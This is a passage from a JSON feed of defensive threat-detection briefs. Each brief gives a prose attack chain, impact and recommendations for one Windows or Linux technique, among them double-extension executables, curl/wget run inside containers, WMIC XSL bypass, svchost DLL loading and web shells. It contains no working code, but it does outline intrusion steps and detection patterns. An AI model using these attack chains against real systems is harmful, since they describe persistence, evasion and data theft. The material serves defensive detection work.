patterns.\u003c/li\u003e\n\u003cli\u003eMonitor process activity for wscript.exe and other scripting engines executing from temporary directories.\u003c/li\u003e\n\u003cli\u003eConfigure endpoint security solutions to block execution of scripts from common temporary directories.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-24T12:00:00Z","date_published":"2024-01-24T12:00:00Z","id":"/briefs/2024-01-script-exec-archive/","summary":"This rule identifies attempts to execute Jscript/Vbscript files from an archive file, a common delivery method for malicious scripts on Windows systems.","title":"Windows Script Execution from Archive File","url":"https://feed.craftedsignal.io/briefs/2024-01-script-exec-archive/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend","Microsoft Defender XDR","SentinelOne Cloud Funnel","CrowdStrike"],"_cs_severities":["medium"],"_cs_tags":["defense-evasion","execution","masquerading","windows"],"_cs_type":"advisory","_cs_vendors":["Elastic","Microsoft"],"content_html":"\u003cp\u003eAdversaries may use masquerading techniques to evade defenses and blend into the environment by manipulating the name or location of a file, tricking users into executing malicious code disguised as a benign file type. This rule detects the creation of executable files with multiple extensions, a common method of masquerading. The rule focuses on identifying suspicious file creations that use misleading extensions, specifically targeting files with an \u0026ldquo;.exe\u0026rdquo; extension preceded by common benign extensions. It excludes known legitimate processes to minimize false positives. This activity is relevant for defenders to identify potential threats where adversaries attempt to bypass security measures by disguising malicious files.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker crafts a malicious executable file with a double extension (e.g., \u0026ldquo;document.pdf.exe\u0026rdquo;).\u003c/li\u003e\n\u003cli\u003eThe attacker delivers the malicious file to the target system via phishing or other means.\u003c/li\u003e\n\u003cli\u003eThe user downloads or receives the file and attempts to open it.\u003c/li\u003e\n\u003cli\u003eWindows displays the file with the first extension (\u0026ldquo;document.pdf\u0026rdquo;) by default, misleading the user.\u003c/li\u003e\n\u003cli\u003eUpon execution, Windows recognizes the \u0026ldquo;.exe\u0026rdquo; extension and executes the file.\u003c/li\u003e\n\u003cli\u003eThe malicious executable runs, potentially deploying malware or performing other unauthorized actions.\u003c/li\u003e\n\u003cli\u003eThe malware establishes persistence or attempts lateral movement within the network.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their objective, such as data theft or system compromise.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to malware infection, data breaches, and system compromise. This technique bypasses common file type restrictions and user awareness, potentially affecting a wide range of users and systems. While the number of victims is not specified, the impact can be significant, particularly in organizations where users handle sensitive data. The affected sectors are broad, encompassing any organization where users are susceptible to social engineering attacks.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Executable File Creation with Multiple Extensions\u0026rdquo; to your SIEM and tune for your environment to detect the creation of suspicious files with multiple extensions.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon Event ID 11 (File Create) for comprehensive file creation monitoring to improve the effectiveness of the detection rule.\u003c/li\u003e\n\u003cli\u003eImplement enhanced monitoring and logging for similar file creation activities to improve detection and response capabilities.\u003c/li\u003e\n\u003cli\u003eEducate users on the risks associated with double file extensions and encourage caution when opening attachments from unknown sources.\u003c/li\u003e\n\u003cli\u003eReview and whitelist legitimate software installations that may create executables with multiple extensions to reduce false positives, as described in the rule\u0026rsquo;s triage notes.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-24T12:00:00Z","date_published":"2024-01-24T12:00:00Z","id":"/briefs/2024-01-executable-file-creation-multiple-extensions/","summary":"Detection of executable files created with multiple extensions, a masquerading technique to evade defenses.","title":"Executable File Creation with Multiple Extensions","url":"https://feed.craftedsignal.io/briefs/2024-01-executable-file-creation-multiple-extensions/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Auditd Manager"],"_cs_severities":["medium"],"_cs_tags":["command-and-control","execution","container","auditd","linux"],"_cs_type":"advisory","_cs_vendors":["Elastic"],"content_html":"\u003cp\u003eThis detection rule identifies instances of \u003ccode\u003ecurl\u003c/code\u003e or \u003ccode\u003ewget\u003c/code\u003e being executed from within containers managed by \u003ccode\u003erunc\u003c/code\u003e on Linux systems. The rule leverages Auditd Manager to monitor system calls and flags processes running with the title \u003ccode\u003erunc init\u003c/code\u003e that then execute \u003ccode\u003ecurl\u003c/code\u003e or \u003ccode\u003ewget\u003c/code\u003e. This activity is noteworthy because attackers often use these tools to download malicious payloads (stagers, scripts, implants) or to exfiltrate data after compromising a container. While these tools can be used legitimately within containers, their execution in the context of \u003ccode\u003erunc init\u003c/code\u003e suggests a higher risk of malicious activity. The rule focuses on narrowing the signal to the container runtime boundary where unexpected download clients are more worthy of review. The rule specifically leverages Auditd Manager for data collection.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a host system, possibly through exploiting a vulnerability in an application running outside the container (e.g., web application).\u003c/li\u003e\n\u003cli\u003eThe attacker identifies a containerized application running on the compromised host.\u003c/li\u003e\n\u003cli\u003eThe attacker exploits a vulnerability within the container, or abuses a privileged workload within the container, to gain elevated privileges or code execution within the container.\u003c/li\u003e\n\u003cli\u003eThe attacker uses \u003ccode\u003ecurl\u003c/code\u003e or \u003ccode\u003ewget\u003c/code\u003e to download additional tools or scripts into the container. These tools might include reverse shells, credential dumping tools, or data exfiltration utilities.\u003c/li\u003e\n\u003cli\u003eThe attacker executes the downloaded tools to further compromise the container or the underlying host.\u003c/li\u003e\n\u003cli\u003eThe attacker uses \u003ccode\u003ecurl\u003c/code\u003e or \u003ccode\u003ewget\u003c/code\u003e to stage data for exfiltration to an external server. This may involve compressing and encoding data before transmission.\u003c/li\u003e\n\u003cli\u003eThe attacker initiates the data exfiltration process using \u003ccode\u003ecurl\u003c/code\u003e or \u003ccode\u003ewget\u003c/code\u003e to send the staged data to a remote server controlled by the attacker.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their final objective, which could include data theft, system disruption, or further lateral movement within the network.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eCompromised containers can lead to data breaches, service disruptions, and further attacks on internal systems. Successful exploitation could allow attackers to steal sensitive data, install malware, or pivot to other parts of the network, impacting confidentiality, integrity, and availability. The number of affected systems depends on the scope of the container deployment and the privileges granted to the compromised container.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Curl or Wget Execution from Container Context\u003c/code\u003e to your SIEM and tune for your environment.\u003c/li\u003e\n\u003cli\u003eEnable Auditd Manager with syscall coverage including \u003ccode\u003eexecve\u003c/code\u003e to capture process execution and arguments within containers, as mentioned in the rule\u0026rsquo;s setup instructions.\u003c/li\u003e\n\u003cli\u003eCorrelate alerts from this rule with network logs to identify the destination IP addresses and domains contacted by the compromised container.\u003c/li\u003e\n\u003cli\u003eBaseline trusted images and exclude stable image digests or namespaces when noisy to reduce false positives, as suggested in the rule\u0026rsquo;s false positives section.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-23T12:00:00Z","date_published":"2024-01-23T12:00:00Z","id":"/briefs/2024-01-curl-wget-container-execution/","summary":"This rule detects the execution of curl or wget from within runc-backed containers on Linux systems monitored by Auditd Manager, indicating potential ingress tool transfer or data exfiltration by attackers who have compromised the container.","title":"Curl or Wget Execution from Container Context","url":"https://feed.craftedsignal.io/briefs/2024-01-curl-wget-container-execution/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend"],"_cs_severities":["medium"],"_cs_tags":["defense-evasion","execution","windows"],"_cs_type":"advisory","_cs_vendors":["Elastic"],"content_html":"\u003cp\u003eThis detection identifies WMIC allowlist bypass techniques by alerting on suspicious execution of scripts. When WMIC loads scripting libraries, such as jscript.dll or vbscript.dll, it may be indicative of an allowlist bypass. Adversaries exploit WMIC to bypass security measures by executing scripts via XSL files. This technique is often used for defense evasion and execution of malicious code. The detection logic focuses on monitoring WMIC executions with atypical arguments (format*:\u003cem\u003e, /format\u003c/em\u003e:\u003cem\u003e, \u003cem\u003e-format\u003c/em\u003e:\u003c/em\u003e) in conjunction with the loading of scripting libraries, indicating potential misuse. The rule is designed for data generated by Elastic Defend and also supports Sysmon data sources.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to the system through various means (e.g., phishing, exploit).\u003c/li\u003e\n\u003cli\u003eThe attacker executes WMIC.exe or wmic.exe with suspicious arguments such as \u0026ldquo;format*:\u003cem\u003e\u0026rdquo;, \u0026ldquo;/format\u003c/em\u003e:\u003cem\u003e\u0026rdquo;, or \u0026ldquo;\u003c/em\u003e-format*:*\u0026rdquo; to leverage XSL script processing.\u003c/li\u003e\n\u003cli\u003eWMIC attempts to load scripting libraries like jscript.dll or vbscript.dll to enable script execution.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the loaded scripting libraries to execute malicious code embedded in an XSL file.\u003c/li\u003e\n\u003cli\u003eThe script performs various malicious actions, such as downloading additional payloads, modifying system configurations, or escalating privileges.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the WMI functionality for lateral movement or persistence within the network.\u003c/li\u003e\n\u003cli\u003eThe attacker evades detection by abusing trusted system binaries (WMIC) and allowlisted scripting engines.\u003c/li\u003e\n\u003cli\u003eThe final objective is to achieve code execution and maintain control over the compromised system for data exfiltration or further malicious activities.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to bypass security measures and execute malicious code on compromised systems. This can lead to a range of adverse effects, including data theft, system compromise, and further propagation of malware within the network. The use of WMIC for defense evasion can make it difficult to detect malicious activity, increasing the risk of successful attacks.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Suspicious WMIC XSL Script Execution\u003c/code\u003e to your SIEM and tune for your environment.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon Event ID 1 (Process Creation) and Event ID 7 (Image Loaded) logging to activate the Sigma rule above.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts triggered by the Sigma rule by reviewing process execution details and command-line arguments.\u003c/li\u003e\n\u003cli\u003eReview the parent process of suspicious WMIC executions to understand the context and origin of the activity.\u003c/li\u003e\n\u003cli\u003eCorrelate the process.entity_id with other related events within a 2-minute window to identify any additional suspicious activities.\u003c/li\u003e\n\u003cli\u003eImplement application control policies to restrict the execution of unauthorized or suspicious XSL files and scripts.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-22T12:00:00Z","date_published":"2024-01-22T12:00:00Z","id":"/briefs/2024-01-22-wmic-xsl-script-execution/","summary":"This rule detects suspicious execution of scripts via WMIC, potentially used for allowlist bypass, by identifying WMIC executions with atypical arguments and the loading of specific libraries like jscript.dll or vbscript.dll for defense evasion and execution.","title":"Suspicious WMIC XSL Script Execution","url":"https://feed.craftedsignal.io/briefs/2024-01-22-wmic-xsl-script-execution/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend"],"_cs_severities":["medium"],"_cs_tags":["persistence","defense-evasion","execution","windows","dll-injection"],"_cs_type":"advisory","_cs_vendors":["Elastic"],"content_html":"\u003cp\u003eAttackers may attempt to load malicious, unsigned DLLs into \u003ccode\u003esvchost.exe\u003c/code\u003e, a legitimate Windows service host process, to maintain persistence or escalate privileges. This technique abuses the shared service host process to execute arbitrary code with SYSTEM privileges. The \u003ccode\u003esvchost.exe\u003c/code\u003e process, which typically hosts multiple Windows services, can be targeted to load malicious DLLs from unusual file paths, potentially bypassing security measures that rely on code signing validation. This is especially concerning because \u003ccode\u003esvchost.exe\u003c/code\u003e is a trusted process, making detection more challenging. The loading of unsigned DLLs by \u003ccode\u003esvchost.exe\u003c/code\u003e from atypical directories is a strong indicator of potential malicious activity, as legitimate Windows services rarely load unsigned libraries from such locations.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn adversary gains initial access to the system through an undisclosed method (e.g., exploitation of a vulnerability or social engineering).\u003c/li\u003e\n\u003cli\u003eThe attacker creates a malicious, unsigned DLL on the compromised system in a non-standard directory like \u003ccode\u003eC:\\ProgramData\\\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker modifies the Windows Registry to configure a service hosted by \u003ccode\u003esvchost.exe\u003c/code\u003e to load the malicious DLL. This often involves manipulating service dependencies or service parameters.\u003c/li\u003e\n\u003cli\u003eThe system is restarted, or the targeted service is manually restarted, causing \u003ccode\u003esvchost.exe\u003c/code\u003e to load the specified DLL.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003esvchost.exe\u003c/code\u003e executes the code within the malicious DLL, now running with the privileges of the hosted service (typically SYSTEM).\u003c/li\u003e\n\u003cli\u003eThe malicious DLL performs actions such as installing backdoors, escalating privileges further, or establishing command and control (C2) communication.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the established C2 channel to remotely control the compromised system, exfiltrate data, or perform other malicious activities.\u003c/li\u003e\n\u003cli\u003eThe attacker maintains persistence on the system by ensuring the malicious DLL is loaded each time the service or system starts.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to gain persistent access to the compromised system with elevated (SYSTEM) privileges. This can lead to complete system compromise, data theft, installation of backdoors, and lateral movement within the network. The use of \u003ccode\u003esvchost.exe\u003c/code\u003e as a host for malicious DLLs makes detection more difficult, allowing attackers to operate undetected for extended periods.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImplement the provided Sigma rule to detect unsigned DLLs loaded by \u003ccode\u003esvchost.exe\u003c/code\u003e, focusing on the specified file paths and code signature status.\u003c/li\u003e\n\u003cli\u003eExamine \u003ccode\u003edll.Ext.relative_file_creation_time\u003c/code\u003e to identify DLLs created shortly before being loaded to catch newly created malicious files.\u003c/li\u003e\n\u003cli\u003eReview and validate the legitimacy of all DLLs loaded by \u003ccode\u003esvchost.exe\u003c/code\u003e, focusing on those located in unusual paths.\u003c/li\u003e\n\u003cli\u003eUpdate endpoint detection and response (EDR) systems to specifically monitor for the loading of unsigned DLLs by system processes like \u003ccode\u003esvchost.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eContinuously update the exclusion list of known good DLL hashes to reduce false positives.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-09T18:30:00Z","date_published":"2024-01-09T18:30:00Z","id":"/briefs/2024-01-unsigned-dll-svchost/","summary":"Adversaries may load unsigned DLLs into svchost.exe to establish persistence or escalate privileges, leveraging a shared Windows service to execute malicious code with elevated permissions.","title":"Unsigned DLL Loaded by Svchost for Persistence and Privilege Escalation","url":"https://feed.craftedsignal.io/briefs/2024-01-unsigned-dll-svchost/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend"],"_cs_severities":["low"],"_cs_tags":["persistence","execution","command-and-control","web shell","linux"],"_cs_type":"advisory","_cs_vendors":["Elastic"],"content_html":"\u003cp\u003eThis detection rule focuses on identifying potentially malicious activity stemming from Linux-based web servers. The rule is triggered when a web server process, such as Apache, Nginx, or others, initiates an outbound network connection to a destination port that is considered non-standard. This activity can signal the presence of a web shell, a malicious script uploaded to a web server to enable remote access and control. Attackers may exploit compromised web servers to establish covert communication channels, exfiltrate data, or launch further attacks on internal systems. The rule leverages data from Elastic Defend to monitor network connections and filter out legitimate traffic based on a predefined list of common ports and internal IP ranges.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eInitial access is gained via exploitation of a vulnerability in a web application or web server component running on a Linux system (e.g., through SQL injection or remote code execution).\u003c/li\u003e\n\u003cli\u003eA web shell is uploaded to the compromised web server, often disguised as a legitimate file or hidden within existing directories.\u003c/li\u003e\n\u003cli\u003eThe attacker interacts with the web shell through HTTP requests, using it as a command and control interface.\u003c/li\u003e\n\u003cli\u003eThe web shell executes commands on the server, initiating outbound network connections to non-standard ports.\u003c/li\u003e\n\u003cli\u003eThese connections may be used to communicate with external C2 servers, download additional payloads, or exfiltrate sensitive data.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the web shell to move laterally within the network, targeting other systems and services.\u003c/li\u003e\n\u003cli\u003eThe attacker attempts to establish persistence on the compromised server, ensuring continued access even after system reboots.\u003c/li\u003e\n\u003cli\u003eThe final objective is data theft, system compromise, or disruption of services.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eCompromised web servers can lead to significant data breaches, system downtime, and reputational damage. While this rule triggers on low-severity behavior, successful exploitation can lead to complete system compromise. The number of affected systems depends on the scope of the initial vulnerability and the attacker\u0026rsquo;s ability to move laterally. Organizations in all sectors that rely on web-based applications are potentially at risk.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the provided Sigma rule to your SIEM to detect web server processes initiating connections to unusual destination ports and tune for your environment.\u003c/li\u003e\n\u003cli\u003eEnable Elastic Defend integration to collect the necessary network event data from Linux endpoints to activate the rule.\u003c/li\u003e\n\u003cli\u003eReview and customize the list of excluded destination ports and internal IP ranges in the Sigma rule to match your organization\u0026rsquo;s specific network configuration and legitimate traffic patterns.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the rule to determine if the activity is malicious or benign, focusing on the process name, user, destination IP, and destination port.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-09T18:28:00Z","date_published":"2024-01-09T18:28:00Z","id":"/briefs/2024-01-uncommon-web-server-port/","summary":"The rule identifies unusual outbound network connections on non-standard ports originating from web server processes on Linux systems, indicative of potential web shell activity or unauthorized communication.","title":"Uncommon Destination Port Connection by Web Server on Linux","url":"https://feed.craftedsignal.io/briefs/2024-01-uncommon-web-server-port/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft Build Engine","Microsoft Defender XDR","Elastic Defend"],"_cs_severities":["high"],"_cs_tags":["defense-evasion","execution","msbuild","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic","Crowdstrike","SentinelOne"],"content_html":"\u003cp\u003eThe Microsoft Build Engine (MSBuild) is a software build platform commonly used by Windows developers. When MSBuild is started by an Office application like Word or Excel, it deviates from typical usage patterns. This behavior can be indicative of a malicious document executing a script payload as part of a defense evasion tactic. Attackers may leverage MSBuild to execute code or perform actions that would otherwise be blocked or detected. This activity is particularly concerning because it can bypass traditional security measures that focus on blocking suspicious executables or scripts directly launched by Office applications. The rule was created in March 2020, and last updated in April 2026.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eA user opens a malicious Office document (e.g., Word, Excel, PowerPoint).\u003c/li\u003e\n\u003cli\u003eThe Office document contains an embedded macro or exploit that triggers the execution of MSBuild.exe.\u003c/li\u003e\n\u003cli\u003eMSBuild.exe is launched as a child process of the Office application (e.g., winword.exe, excel.exe, powerpnt.exe).\u003c/li\u003e\n\u003cli\u003eMSBuild executes a project file or inline task specified in the command line. This can involve compiling code, executing scripts, or performing other actions.\u003c/li\u003e\n\u003cli\u003eThe executed code or script performs malicious activities, such as downloading additional payloads, modifying system settings, or establishing persistence.\u003c/li\u003e\n\u003cli\u003eMSBuild may spawn child processes, such as cmd.exe, powershell.exe, or other utilities, to further execute malicious commands.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their objective, which could include data exfiltration, installing malware, or gaining unauthorized access to the system.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to the execution of arbitrary code on the victim\u0026rsquo;s machine, potentially resulting in data theft, malware installation, or complete system compromise. Since MSBuild is a legitimate Microsoft tool, its use by malicious actors can make detection more challenging. The impact is high because it leverages a trusted process to carry out malicious activities, evading standard security measures.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Microsoft Build Engine Started by an Office Application\u0026rdquo; to your SIEM to detect this specific behavior based on process creation events.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process creation logging with the appropriate configuration to capture the necessary process start events for the Sigma rule to function correctly.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule, focusing on the command-line arguments of MSBuild.exe and the parent process information, including the executable name and command line.\u003c/li\u003e\n\u003cli\u003eMonitor process execution events for MSBuild.exe with parent processes being Office applications as a high priority indicator of potential compromise.\u003c/li\u003e\n\u003cli\u003eReview and harden Office macro settings to prevent execution of malicious macros.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-09T18:22:00Z","date_published":"2024-01-09T18:22:00Z","id":"/briefs/2024-01-msbuild-office-app/","summary":"The Microsoft Build Engine (MSBuild) being started by an Office application is unusual behavior and could indicate a malicious document executing a script payload for defense evasion.","title":"Microsoft Build Engine Started by an Office Application","url":"https://feed.craftedsignal.io/briefs/2024-01-msbuild-office-app/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["WINWORD.EXE","EXCEL.EXE","POWERPNT.EXE","MSPUB.EXE","MSACCESS.EXE"],"_cs_severities":["medium"],"_cs_tags":["wmi","image load","office","execution"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eThis detection rule identifies suspicious image loading of \u003ccode\u003ewmiutils.dll\u003c/code\u003e from Microsoft Office processes (WINWORD.EXE, EXCEL.EXE, POWERPNT.EXE, MSPUB.EXE, MSACCESS.EXE). Adversaries can use this technique to execute code and evade traditional parent/child processes spawned from Microsoft Office products. This behavior may indicate adversarial activity where child processes are spawned via Windows Management Instrumentation (WMI).\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eUser opens a malicious Microsoft Office document (e.g., Word, Excel).\u003c/li\u003e\n\u003cli\u003eThe document contains a macro or exploit that triggers the execution of WMI commands.\u003c/li\u003e\n\u003cli\u003eThe Office application spawns a WMI process or utilizes existing WMI infrastructure.\u003c/li\u003e\n\u003cli\u003eThe WMI process loads the \u003ccode\u003ewmiutils.dll\u003c/code\u003e library, which is unusual for normal Office operations.\u003c/li\u003e\n\u003cli\u003eThe WMI commands execute malicious code, potentially downloading or executing further payloads.\u003c/li\u003e\n\u003cli\u003eThe attacker establishes persistence through WMI event subscriptions or other methods.\u003c/li\u003e\n\u003cli\u003eThe attacker performs lateral movement using WMI to execute commands on other systems.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to execute arbitrary code, establish persistence, and move laterally within the network, potentially leading to data exfiltration, system compromise, or ransomware deployment. While the number of victims is unknown, this technique can be used in targeted attacks against organizations that heavily rely on Microsoft Office applications.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Suspicious WMI Image Load from MS Office\u0026rdquo; to your SIEM and tune for your environment.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon event ID 7 (Image Loaded) logging for comprehensive image load monitoring as suggested in the \u003ca href=\"https://ela.st/sysmon-event-7-setup\"\u003esetup instructions\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eMonitor process creation events for Microsoft Office applications spawning WMI-related processes (e.g., \u003ccode\u003ewbemtest.exe\u003c/code\u003e, \u003ccode\u003ewmic.exe\u003c/code\u003e) to detect potential WMI abuse.\u003c/li\u003e\n\u003cli\u003eImplement network segmentation to limit lateral movement in case of a successful WMI-based attack.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-09T12:00:00Z","date_published":"2024-01-09T12:00:00Z","id":"/briefs/2024-01-suspicious-wmi-image-load/","summary":"Adversaries may exploit Windows Management Instrumentation (WMI) to execute code stealthily, bypassing traditional security measures by loading `wmiutils.dll` from Microsoft Office applications, potentially indicating malicious execution.","title":"Suspicious WMI Image Load from MS Office","url":"https://feed.craftedsignal.io/briefs/2024-01-suspicious-wmi-image-load/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend"],"_cs_severities":["low"],"_cs_tags":["execution","initial-access","defense-evasion","discovery"],"_cs_type":"advisory","_cs_vendors":["Elastic"],"content_html":"\u003cp\u003eAttackers are increasingly leveraging PDF reader applications as an initial access vector, exploiting vulnerabilities within these programs or using social engineering to trick users into opening malicious PDF documents. Upon successful exploitation, adversaries often spawn built-in Windows utilities from the compromised PDF reader process to perform reconnaissance, escalate privileges, or establish persistence. This activity is designed to blend in with normal system operations, making it difficult to detect without specific monitoring and detection rules. The targeted software commonly includes Adobe Acrobat, Adobe Reader, and Foxit Reader. Defenders should be vigilant for unexpected child processes of PDF readers, especially command-line interpreters and system administration tools.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eA user receives a malicious PDF document via phishing or other means.\u003c/li\u003e\n\u003cli\u003eThe user opens the PDF document using a vulnerable PDF reader application (e.g., Adobe Acrobat, Foxit Reader).\u003c/li\u003e\n\u003cli\u003eThe PDF document exploits a vulnerability or uses a malicious script to execute an arbitrary command.\u003c/li\u003e\n\u003cli\u003eThe PDF reader application spawns a command-line interpreter (e.g., cmd.exe, powershell.exe) or a system administration tool (e.g., reg.exe, net.exe).\u003c/li\u003e\n\u003cli\u003eThe spawned process executes commands to gather system information (e.g., ipconfig.exe, systeminfo.exe, whoami.exe).\u003c/li\u003e\n\u003cli\u003eThe attacker may attempt to discover network configuration, user accounts, or running processes.\u003c/li\u003e\n\u003cli\u003eThe attacker could leverage the spawned process to download and execute further payloads.\u003c/li\u003e\n\u003cli\u003eThe attacker gains a foothold on the system and can proceed with lateral movement, data exfiltration, or other malicious activities.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of PDF reader applications can lead to initial access, privilege escalation, and further compromise of the affected system. While individual incidents may have a low risk score, widespread exploitation can lead to significant data breaches, system downtime, and reputational damage. The use of legitimate system utilities for malicious purposes can make detection challenging, allowing attackers to operate undetected for extended periods.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable process creation logging with command line arguments to capture the execution of suspicious child processes (Sysmon Event ID 1, Windows Security Event Logs).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Suspicious PDF Reader Child Process\u0026rdquo; to your SIEM and tune for your environment to detect the execution of suspicious processes spawned by PDF reader applications.\u003c/li\u003e\n\u003cli\u003eMonitor for network connections originating from PDF reader applications to unusual or external IP addresses.\u003c/li\u003e\n\u003cli\u003eImplement application control policies to restrict the execution of unauthorized or unknown executables.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-04T18:45:00Z","date_published":"2024-01-04T18:45:00Z","id":"/briefs/2024-01-suspicious-pdf-child-process/","summary":"Adversaries may exploit PDF reader applications to execute arbitrary commands and establish a foothold within a system, often launching built-in utilities for reconnaissance and privilege escalation.","title":"Suspicious PDF Reader Child Process Activity","url":"https://feed.craftedsignal.io/briefs/2024-01-suspicious-pdf-child-process/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend"],"_cs_severities":["medium"],"_cs_tags":["phishing","execution","url-file","windows"],"_cs_type":"advisory","_cs_vendors":["Elastic"],"content_html":"\u003cp\u003eAttackers commonly use .url shortcut files in phishing campaigns to deliver malicious payloads. These files, when downloaded from non-local sources, may bypass traditional security measures. This detection rule identifies such files by monitoring their creation events on Windows systems. The rule focuses on files with the .url extension and a zone identifier indicating they originated from outside the local network. These files are often delivered via email or malicious websites, tricking users into clicking them, which can lead to the execution of arbitrary commands or the redirection to malicious websites. This technique allows attackers to gain initial access or execute malicious code on the victim\u0026rsquo;s machine.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker crafts a phishing email or a malicious website containing a link to a .url file.\u003c/li\u003e\n\u003cli\u003eThe victim clicks the link, resulting in the download of the .url file to their Windows system.\u003c/li\u003e\n\u003cli\u003eThe .url file is created on the filesystem, triggering a file creation event.\u003c/li\u003e\n\u003cli\u003eThe operating system assigns a Zone Identifier to the file, marking it as originating from an external source.\u003c/li\u003e\n\u003cli\u003eThe victim double-clicks the .url file, which contains a URL pointing to a malicious website or an 